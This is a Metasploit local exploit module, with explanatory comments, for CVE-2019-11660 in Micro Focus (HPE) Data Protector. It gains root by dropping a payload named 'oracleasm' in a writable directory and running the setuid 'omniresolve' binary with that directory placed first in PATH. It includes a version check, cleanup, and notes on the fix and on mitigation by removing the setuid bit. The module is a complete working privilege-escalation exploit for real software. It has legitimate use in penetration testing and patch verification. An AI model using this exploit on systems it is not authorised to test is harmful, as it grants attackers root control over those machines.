##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation for Micro Focus (HPE) Data Protector (CVE-2019-11660).
#
# Root cause, as stated in the module description: the SUID binary `omniresolve`
# executes `oracleasm` by relative name, so the caller's `$PATH` decides which
# `oracleasm` is run. A writable directory placed at the front of `$PATH` is
# therefore enough to run an attacker-chosen file as root. The fix is the
# vendor build named in the description (A.10.40 build 125); until then,
# removing the setuid bit from `omniresolve` or restricting who can invoke it
# removes the escalation path.
#
# Observable side effects (declared as ARTIFACTS_ON_DISK below): a file named
# `oracleasm` and a randomly named trigger file are written to `WritableDir`
# (default `/tmp`), and `omniresolve` is invoked with a non-default `PATH`.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  # AutoCheck runs #check before #exploit and aborts when the target
  # is reported as not vulnerable (unless overridden by the operator).
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata and the two operator-controlled options:
  # SUID_PATH (location of the setuid omniresolve) and the advanced
  # WritableDir (staging directory that is prepended to $PATH).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
        'Description' => %q{
          This module exploits the trusted `$PATH` environment
          variable of the SUID binary `omniresolve` in
          Micro Focus (HPE) Data Protector A.10.40 and prior.

          The `omniresolve` executable calls the `oracleasm` binary using
          a relative path and the trusted environment `$PATH`, which allows
          an attacker to execute a custom binary with `root` privileges.

          This module has been successfully tested on:
          HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;
          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)

          The vulnerability has been patched in:
          Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
        },
        'License' => MSF_LICENSE,
        'Author' => [
          's7u55', # Discovery and Metasploit module
        ],
        'DisclosureDate' => '2019-09-13',
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [
            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
            # upper_version is the newest affected release; #check also
            # compares the build number when the version is exactly 10.40.
            { upper_version: Rex::Version.new('10.40') }
          ]
        ],
        'DefaultOptions' => {
          'PrependSetgid' => true,
          'PrependSetuid' => true
        },
        'References' => [
          [ 'CVE', '2019-11660' ],
          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        },
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
      ]
    )

    register_advanced_options(
      [
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
      ]
    )
  end

  # Staging directory for dropped files, as a String (from WritableDir).
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Path of the setuid omniresolve binary, as a String (from SUID_PATH).
  def suid_bin_path
    datastore['SUID_PATH'].to_s
  end

  # Determines whether the target looks vulnerable.
  #
  # Returns CheckCode::Safe when the binary is missing, is not setuid, or
  # reports a version newer than the affected range; CheckCode::Appears when
  # the parsed version is < 10.40, or == 10.40 with build <= 118; and
  # CheckCode::Detected when `-ver` output could not be parsed.
  def check
    return CheckCode::Safe("#{suid_bin_path} file not found") unless file? suid_bin_path
    return CheckCode::Safe("#{suid_bin_path} is not setuid") unless setuid? suid_bin_path

    info = cmd_exec("#{suid_bin_path} -ver").to_s
    # Expects an "A.10.40 ... build 118"-style banner (see the tested
    # versions in the description): group 1 is the two-part version,
    # group 3 the three-digit internal build number.
    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
      # Round-tripping through Float drops a leading zero ("09.07" -> "9.07")
      # so the string compares cleanly as a Rex::Version.
      version = '%.2f' % ::Regexp.last_match(1).to_f
      build = ::Regexp.last_match(3).to_i
      vprint_status("omniresolve version #{version} build #{build}")

      # Anything above 10.40, or 10.40 with a build after 118, is treated as fixed.
      unless Rex::Version.new(version) < target[:upper_version] ||
             (Rex::Version.new(version) == target[:upper_version] && build <= 118)
        return CheckCode::Safe
      end

      return CheckCode::Appears
    end

    vprint_error('Could not parse omniresolve -ver output')
    CheckCode::Detected
  end

  # Drops the payload as `oracleasm` in WritableDir and runs the setuid
  # binary with that directory prepended to PATH.
  #
  # Fails with Failure::BadConfig when the session is already root (unless
  # ForceExploit is set) or when WritableDir is not writable. Both dropped
  # files are registered with FileDropper so they are removed at cleanup.
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    # The file name must be exactly `oracleasm`: that is the relative name
    # omniresolve resolves through $PATH (per the description).
    payload_path = File.join(base_dir, 'oracleasm')
    # Registered before writing so cleanup still covers a partially written file.
    register_file_for_cleanup(payload_path)
    write_file(payload_path, generate_payload_exe)
    chmod(payload_path)

    # Randomly named input file with random `a:b` placeholder content,
    # handed to omniresolve via `-i` purely to make it run.
    trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    register_file_for_cleanup(trigger_path)
    write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")
    # NOTE(review): base_dir, suid_bin_path and trigger_path are interpolated
    # unquoted into a shell command; they come from operator-controlled
    # options, not from the target, so this is a robustness rather than a
    # trust-boundary concern. The command is backgrounded and the trailing
    # `echo` presumably keeps cmd_exec from blocking on the spawned payload.
    cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")
  end
end